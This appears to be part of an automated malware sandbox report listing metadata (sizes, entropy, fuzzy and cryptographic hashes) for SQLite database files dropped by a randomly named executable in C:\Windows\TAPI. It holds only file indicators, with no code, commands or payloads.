                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
